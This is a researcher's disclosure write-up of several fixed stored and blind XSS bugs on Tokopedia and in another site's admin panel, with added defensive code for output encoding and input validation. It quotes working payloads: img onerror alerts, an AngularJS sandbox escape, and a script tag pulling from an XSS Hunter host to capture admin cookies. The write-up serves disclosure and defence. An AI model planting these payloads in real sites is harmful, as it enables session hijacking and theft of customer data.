Multiple Stored XSS On Tokopedia

So, these are just old bugs that I reported around 2018. I'll share what I found on Tokopedia, just in case you need some article to fall asleep to. It'll be just a short description and PoC for each. Here it is:

Stored XSS On Complain Product (Keterangan Bukti Field)

This vulnerability is in the product complaint feature: when a buyer is not satisfied with the item they bought, they can file a complaint and upload an image. The vulnerability is in the image description field.

PoC :

  1. Go to the complaint menu
  2. Upload an image
  3. Enter the payload in the image description ( <img src=x onerror=alert(document.domain)> )
  4. The payload executes when the user navigates to the resolution menu.

Video :

Stored XSS On Location Shop (m.tokopedia.com )

This vulnerability is in the shop location parameter at https://m.tokopedia.com/ . The bug is simply setting the shop location to the payload; when someone navigates to the shop detail, the XSS pops up.

PoC :

  1. Open the Tokopedia mobile app
  2. Edit the shop location to the XSS payload ( <img src=x onerror=alert(document.domain)> )
  3. Open the location via the browser

Video :

Stored XSS via AngularJS Injection On Etalase Name

The vulnerability exists because Tokopedia used an old version of AngularJS and did not filter illegal characters very well. So I just inserted an AngularJS injection payload into the Etalase name and the XSS fired.

PoC :

  1. Go to Add product
  2. Set the Etalase name to the AngularJS payload ( {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(document.domain)//');}} )
  3. Save, and open the product
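As an added example (not Tokopedia's code, and not part of the original post), here is the rendering-side fix for the three stored XSS sinks above: HTML-encode user data in every field, and, where legacy AngularJS compiles the page, also keep user data out of interpolation with ng-non-bindable, since entity encoding alone leaves {{ }} intact in the DOM text. The helper names and the view fragments are assumptions; the sample values are the two payloads quoted in the PoCs.

```javascript
// Added example (not Tokopedia's code). Output encoding for stored fields such as
// a complaint image description, a shop location or an Etalase name, plus the
// extra step that a page compiled by AngularJS 1.x needs. Helper names are assumptions.

// Encode the five HTML metacharacters so user data cannot break out of text
// content or a double-quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// True if the string contains a raw "<" that the HTML parser would read as the
// start of a tag, end tag or comment, i.e. the encoding step was skipped.
function startsTag(text) {
  return /<[a-z\/!?]/i.test(text);
}

// True if the text still carries an AngularJS interpolation marker. Entity
// encoding does not help here: "{{" is not an HTML metacharacter and survives
// untouched, so a legacy AngularJS compiler running over the DOM would evaluate it.
function hasInterpolation(text) {
  return /\{\{[\s\S]*?\}\}/.test(text);
}

// Server-side view: user data is encoded in both attribute and text positions.
function renderField(cssClass, value) {
  return `<span class="${escapeHtml(cssClass)}">${escapeHtml(value)}</span>`;
}

// Same view for a page that AngularJS 1.x compiles: ng-non-bindable tells the
// compiler to skip this element, so {{ }} inside it is never evaluated.
function renderFieldAngular(cssClass, value) {
  return `<span class="${escapeHtml(cssClass)}" ng-non-bindable>${escapeHtml(value)}</span>`;
}

// Sample values: the payloads quoted in the PoCs above.
const IMG_PAYLOAD = "<img src=x onerror=alert(document.domain)>";
const NG_PAYLOAD = "{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(document.domain)//');}}";

// Summary a reviewer can eyeball: which defence a given stored value needs.
function assess(value) {
  const encoded = escapeHtml(value);
  return {
    rawStartsTag: startsTag(value),          // encoding required
    encodedStartsTag: startsTag(encoded),    // should always be false
    needsNonBindable: hasInterpolation(encoded), // encoding alone is not enough
  };
}

console.log(assess(IMG_PAYLOAD));
console.log(assess(NG_PAYLOAD));
console.log(renderFieldAngular("etalase-name", NG_PAYLOAD));
```

The img payload is fully neutralised by escapeHtml, but the Etalase payload is not: assess reports needsNonBindable as true for it, which is exactly why a template that only entity-encodes still fires on a page that old AngularJS compiles.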

Video :

Blind XSS on CS System ( Tokocash )

Tokopedia has a CS system that uses the Salesforce application. After some discussion between Tokopedia and Salesforce, the root cause turned out to be in Tokopedia's custom code.

PoC :

  1. Log in to Tokocash.com
  2. Request a new ticket with an XSS Hunter payload
  3. Wait for the payload to execute and show up on the XSS Hunter dashboard.

Actually, I found more stored XSS, but sadly those were marked as duplicates. I only listed the fresh bugs that were marked as valid.

Thanks! Get in touch with me on Twitter: Apapedulimu

Blind XSS in Admin Panel on Name Parameter

Description :

The blind XSS fires in the admin panel on the name parameter. During registration there is a Full Name field; I filled it with an XSS payload, using XSS Hunter to execute it. The next day I found my XSS result on the XSS Hunter dashboard, coming from their admin panel. I was able to see the admin's IP, cookies, path, etc. Probably the admin activates or reviews user registrations.

PoC :

1. Register a new account and fill the Full Name field with the payload from XSS Hunter. ( "><script src=https://apapedulim.xss.ht></script> )
2. Complete the registration.
3. Wait until the next day.

Impact :

Getting the admin's IP, cookies and path from the XSS, and being able to get a list of other customers' details such as names and IDs.
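An added example (not the affected site's code, and not part of the original post) of the defender's side of this finding: allowlist validation for a Full Name field at registration, and an audit pass over already-stored records that tells an analyst which names could never have passed and why. The record layout, helper names and sample rows are constructed here; the sample rows reuse the two payload shapes from this post with a placeholder XSS Hunter hostname.

```javascript
// Added example (not the affected site's code). A registration field that is later
// rendered in an admin panel gets an allowlist, not a blocklist, and existing rows
// get audited against the same rule. Record shape and samples are constructed.

// Unicode letters and marks, spaces, apostrophes, hyphens and periods cover real
// names; angle brackets, quotes, braces and slashes are simply not allowed.
const NAME_RE = /^[\p{L}\p{M}][\p{L}\p{M} .'-]{0,99}$/u;

function validateFullName(name) {
  if (typeof name !== "string") return { ok: false, reason: "not a string" };
  const trimmed = name.trim();
  if (trimmed.length === 0) return { ok: false, reason: "empty" };
  if (!NAME_RE.test(trimmed)) return { ok: false, reason: "disallowed characters" };
  return { ok: true, value: trimmed };
}

// Which patterns made a stored value suspicious. This is triage data for the
// analyst, not the blocking decision; blocking is done by the allowlist above.
function markupIndicators(value) {
  const checks = [
    ["tag-start", /<\s*[a-z\/!]/i],          // raw tag opener
    ["attr-breakout", /["'][^"']*>/],        // closes a quoted attribute, then the tag
    ["script-src", /<script[^>]*\bsrc\s*=/i], // loads script from another origin
    ["event-handler", /\bon[a-z]+\s*=/i],    // onerror=, onload=, ...
    ["ng-interpolation", /\{\{[\s\S]*?\}\}/], // AngularJS template expression
  ];
  return checks.filter(([, re]) => re.test(value)).map(([name]) => name);
}

// Audit stored registration records: ids whose full_name would not pass
// validation today, with the reason and indicators for follow-up.
function auditRegistrations(records) {
  return records
    .map((r) => ({
      id: r.id,
      check: validateFullName(r.full_name),
      indicators: markupIndicators(String(r.full_name)),
    }))
    .filter((r) => !r.check.ok)
    .map(({ id, check, indicators }) => ({ id, reason: check.reason, indicators }));
}

// Constructed sample records; the hostname is a placeholder, not a real XSS Hunter one.
const SAMPLE_RECORDS = [
  { id: 101, full_name: "Budi Santoso" },
  { id: 102, full_name: "Anne-Marie O'Neil" },
  { id: 103, full_name: '"><script src=https://EXAMPLE-PLACEHOLDER.xss.ht></script>' },
  { id: 104, full_name: "<img src=x onerror=alert(document.domain)>" },
  { id: 105, full_name: "" },
];

console.log(auditRegistrations(SAMPLE_RECORDS));
```

Validation at input time does not replace output encoding in the admin panel (the previous example); the two together mean a value like row 103 is rejected on the way in and, if one ever slips through another path, is still rendered as inert text on the way out.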

How do you know it's a blind XSS on the admin page?

Actually, I wasn't sure the first time I found it. After registering my account, I got an email from the website to confirm my account, and in it my name had turned into "> . In my recent test, using that payload, only "> was shown, and the XSS payload executed.

Verifying my email address from the website.

I assumed it would be a stored XSS that fires in the admin panel, so I waited, and got the response from the admin panel.

Note: The team requested limited disclosure.

I contacted the team via their contact page and got a positive response from them. After seeing my report they fixed the vuln and will send me some swag. Yay!

Thanks.